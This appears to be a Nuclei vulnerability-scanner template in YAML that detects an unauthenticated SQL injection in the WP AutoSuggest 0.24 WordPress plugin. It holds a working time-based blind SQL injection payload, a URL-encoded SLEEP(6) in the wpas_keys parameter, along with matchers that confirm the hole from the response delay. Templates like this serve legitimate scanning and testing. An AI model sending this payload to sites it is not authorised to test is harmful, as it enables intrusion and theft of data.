32 lines
1.2 KiB
YAML
32 lines
1.2 KiB
YAML
id: wp-autosuggest-sql-injection
|
|
|
|
info:
|
|
name: WP AutoSuggest 0.24 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/9188
|
|
- https://wordpress.org/plugins/wp-autosuggest/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/xml")'
|
|
- 'contains(body, "<results>")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100b4f4ff6fb2239ec707657d1bc296a090c73b74dd6c3ff9527f28147b8a68a6c0022100b2d0fcb290a8d24083340cf31e35243ede7ef10dc17fe8f2d0569c575cdab3c1:922c64590222798bb761d5b6d8e72950 |